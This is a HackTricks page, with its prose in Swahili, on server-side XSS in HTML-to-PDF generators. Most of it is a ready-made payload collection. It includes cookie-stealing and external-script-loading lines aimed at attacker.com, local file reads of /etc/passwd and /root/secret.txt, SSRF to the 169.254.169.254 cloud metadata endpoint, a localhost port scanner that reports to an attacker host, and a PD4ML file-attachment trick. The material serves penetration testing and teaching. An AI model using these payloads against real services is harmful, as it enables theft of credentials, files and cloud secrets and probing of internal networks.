Server Side XSS (Dynamic PDF)

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Server Side XSS (Dynamic PDF)

Ikiwa ukurasa wa wavuti unaunda PDF kwa kutumia pembejeo zinazodhibitiwa na mtumiaji, unaweza kujaribu kudanganya bot inayounda PDF ili kutekeleza msimbo wa JS usio na mipaka. Hivyo, ikiwa bot ya kuunda PDF inapata aina fulani ya HTML tags, itakuwa inafasiri hizo, na unaweza kuitumia tabia hii kusababisha Server XSS.

Tafadhali, fahamu kwamba lebo za <script></script> hazifanyi kazi kila wakati, hivyo utahitaji njia tofauti ya kutekeleza JS (kwa mfano, kutumia <img ). Pia, kumbuka kwamba katika unyakuzi wa kawaida utaweza kuona/kupakua pdf iliyoundwa, hivyo utaweza kuona kila kitu unachokiandika kupitia JS (ukitumia document.write() kwa mfano). Lakini, ikiwa hutaweza kuona PDF iliyoundwa, labda utahitaji kuchota taarifa kwa kufanya ombi la wavuti kwako (Blind).

Uundaji wa PDF maarufu

wkhtmltopdf inajulikana kwa uwezo wake wa kubadilisha HTML na CSS kuwa hati za PDF, ikitumia injini ya uwasilishaji ya WebKit. Chombo hiki kinapatikana kama zana ya amri ya chanzo wazi, na kufanya iweze kupatikana kwa matumizi mbalimbali.
TCPDF inatoa suluhisho thabiti ndani ya mfumo wa PHP kwa uundaji wa PDF. Ina uwezo wa kushughulikia picha, grafiki, na usimbaji, ikionyesha uwezo wake wa kuunda hati ngumu.
Kwa wale wanaofanya kazi katika mazingira ya Node.js, PDFKit inatoa chaguo linalofaa. Inaruhusu uundaji wa hati za PDF moja kwa moja kutoka HTML na CSS, ikitoa daraja kati ya maudhui ya wavuti na fomati zinazoweza kuchapishwa.
Wandelezaji wa Java wanaweza kupendelea iText, maktaba ambayo si tu inarahisisha uundaji wa PDF bali pia inasaidia vipengele vya juu kama saini za dijitali na kujaza fomu. Seti yake kamili ya vipengele inafanya iweze kutumika kwa kuunda hati salama na za mwingiliano.
FPDF ni maktaba nyingine ya PHP, inayojulikana kwa urahisi na urahisi wa matumizi. Imeundwa kwa wandelezaji wanaotafuta njia rahisi ya uundaji wa PDF, bila haja ya vipengele vya kina.

Payloads

Discovery

<!-- Basic discovery, Write somthing-->
<img src="x" onerror="document.write('test')" />
<script>document.write(JSON.stringify(window.location))</script>
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>

<!--Basic blind discovery, load a resource-->
<img src="http://attacker.com"/>
<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
<link rel=attachment href="http://attacker.com">

SVG

Miongoni mwa payloads zilizotajwa hapo awali zinaweza kutumika ndani ya payload hii ya SVG. Iframe moja inayofikia subdomain ya Burpcollab na nyingine inayofikia endpoint ya metadata zimewekwa kama mifano.

<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
<g>
<foreignObject width="800" height="500">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
</body>
</foreignObject>
</g>
</svg>


<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
<script type="text/javascript">
// <![CDATA[
alert(1);
// ]]>
</script>
</svg>

Unaweza kupata mifumo mingine ya SVG nyingi katika https://github.com/allanlw/svg-cheatsheet

Ufunuo wa njia

<!-- If the bot is accessing a file:// path, you will discover the internal path
if not, you will at least have wich path the bot is accessing -->
<img src="x" onerror="document.write(window.location)" />
<script> document.write(window.location) </script>

Load an external script

Njia bora ya kutumia udhaifu huu ni kutumia udhaifu huo ili kufanya bot ipekee script unayodhibiti kwa ndani. Kisha, utaweza kubadilisha payload kwa ndani na kufanya bot iipakue kwa kutumia msimbo sawa kila wakati.

<script src="http://attacker.com/myscripts.js"></script>
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>

Soma faili la ndani / SSRF

Badilisha file:///etc/passwd kwa http://169.254.169.254/latest/user-data kwa mfano ili ujaribu kufikia ukurasa wa wavuti wa nje (SSRF).

Ikiwa SSRF inaruhusiwa, lakini huwezi kufikia kikoa au IP ya kuvutia, angalia ukurasa huu kwa njia za kuweza kupita.

<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send();
</script>

<script>
xhzeem = new XMLHttpRequest();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
xhzeem.open("GET","file:///etc/passwd");
xhzeem.send();
</script>

<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<link rel=attachment href="file:///root/secret.txt">
<object data="file:///etc/passwd">
<portal src="file:///etc/passwd" id=portal>
<embed src="file:///etc/passwd>" width="400" height="400">
<style><iframe src="file:///etc/passwd">
<img src='x' onerror='document.write('<iframe src=file:///etc/passwd></iframe>')'/>&text=&width=500&height=500
<meta http-equiv="refresh" content="0;url=file:///etc/passwd" />

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />

Kuchelewesha bot

<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
<script>
let time = 500;
setInterval(()=>{
let img = document.createElement("img");
img.src = `https://attacker.com/ping?time=${time}ms`;
time += 500;
}, 500);
</script>
<img src="https://attacker.com/delay">

Skana ya Bandari

<!--Scan local port and receive a ping indicating which ones are found-->
<script>
const checkPort = (port) => {
fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
let img = document.createElement("img");
img.src = `http://attacker.com/ping?port=${port}`;
});
}

for(let i=0; i<1000; i++) {
checkPort(i);
}
</script>
<img src="https://attacker.com/startingScan">

SSRF

Uthibitisho huu unaweza kubadilishwa kwa urahisi kuwa SSRF (kama unaweza kufanya script ipakue rasilimali za nje). Hivyo jaribu tu kuutumia (soma metadata baadhi?).

Attachments: PD4ML

Kuna injini kadhaa za HTML 2 PDF ambazo zinaruhusu kuelezea viambatisho kwa PDF, kama PD4ML. Unaweza kutumia kipengele hiki kuambatisha faili yoyote ya ndani kwenye PDF. Ili kufungua kiambatisho nilifungua faili hiyo kwa Firefox na kubonyeza mara mbili alama ya Paperclip ili kuhifadhi kiambatisho kama faili mpya. Kuchukua jibu la PDF na burp pia kitaonyesha kiambatisho kwa maandiko wazi ndani ya PDF.

<!-- From https://0xdf.gitlab.io/2021/04/24/htb-bucket.html -->
<html><pd4ml:attachment src="/etc/passwd" description="attachment sample" icon="Paperclip"/></html>

Marejeo

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousPDF Injection NextShadow DOM

Last updated 7 days ago